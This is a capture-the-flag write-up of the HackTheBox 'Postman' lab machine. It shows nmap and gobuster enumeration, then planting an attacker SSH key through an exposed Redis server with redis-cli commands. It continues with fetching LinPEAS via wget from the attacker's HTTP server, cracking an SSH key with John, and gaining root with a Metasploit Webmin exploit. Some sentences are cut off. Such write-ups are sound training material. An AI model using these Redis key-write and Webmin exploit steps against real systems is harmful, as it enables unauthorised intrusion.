HackTheBox Postman Write Up13 Mar 2020
Let’s run a quick nmap scan as always.
# nmap -sV -sC -O -oA nmap/initial 10.10.10.160
-sV Version detection -sC Script scan -O Enable OS detection -oA Output to all formats
For a more detailed explanation click here.
While I wait for this to be finished I’ll start a full nmap scan.
# nmap -sV -sC -O -p- -oA nmap/initial 10.10.10.160
As usual we have port 22 and port 80 running, but here we also have http protocol running on port 10000, let’s enumerate on those pages.
Now on the second server I have to add a “s” to my http request so I can access that.
I’ll also start up gobuster. On port 10000 every page link loads the same login so gobuster doesn’t help us there. Let’s run it on port 80.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.160 -x php,html -t 100
Now I felt kinda lost so I looked into what did the full nmap scan find.
Getting user account
Redis file write
So we have something called Redis here running. I tried to find some explanation to what is it and how to exploit it, Google found this.
The Redis security model is: “it’s totally insecure to let untrusted clients access the system, please protect it from the outside world yourself”.
So we’re on the right track. The developer guides us for the next steps on how to exploit this. Using
telnet we can see now that we can connect to the machine easily:
$ telnet 10.10.10.160 6379
We don’t have a real shell here but we can write some files. We’ll write our own ssh keys. Let’s generate them.
We will push the key and pad it before and after. Why? Well we’ll push it to Redis memory and then flush the memory to a file. The memory will contain a lot of garbage and we’re hoping ssh will parse the file, ignore the garbage and correctly read our key.
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
Now foo.txt is just our public key but with newlines. We can write this string inside the memory of Redis using
$ redis-cli -h 10.10.10.160 flushall $ cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit
Looks good. How to dump our memory content into the
authorized_keys file? You can see what have I done in picture below.
Now that we’ve got a shell, we can see by running
$ cat /etc/passwd
that we have to gain access to Matt’s account.
We can’t run anything as sudo and we don’t belong in any special groups. I searched the redis dir but there wasn’t anything we could work with, I went into
/var and checked every folder and again, nothing we can work with. Let’s pull the big guns out. Big guns being LinPEAS. Let’s transfer them onto the server.
Clone the repo to your machine, enter the
/linPEAS dir and start an http server from there. I used port 1114.
$ sudo python -m SimpleHTTPServer 1114
Now, navigate to
/tmp and create a dir there and cd into it (e.g.
/tmp/1234), then grab the file from the machine.
$ wget <your ip here>:1114/linpeas.sh
Now I ran the script and spent some time looking at the output. This took some time but there is a
Cracking ssh key with John
Simply pipe this into ssh2john.py and crack it with the rockyou.txt wordlist.
I tried to ssh into the server with this key but no success. So I connected again as redis and ran
$ su Matt
And that’s how I got user
Matt@Postman:~$ cat user.txt 517ad...
Getting root is pretty easy, I just logged into webmin with
computer2008. In there I couldn’t do anything, but we can see a notification that we have to update the software.
Webmin privilege escalation
I found an exploit on Metasploit and used it. Below are highlighted the options which are changed. Make sure to switch the payload as the default one didn’t work. I always have success in using the python one.
> show payloads > set payload <payload here>
After this you can simply type
exploit and you should have a shell as root and you can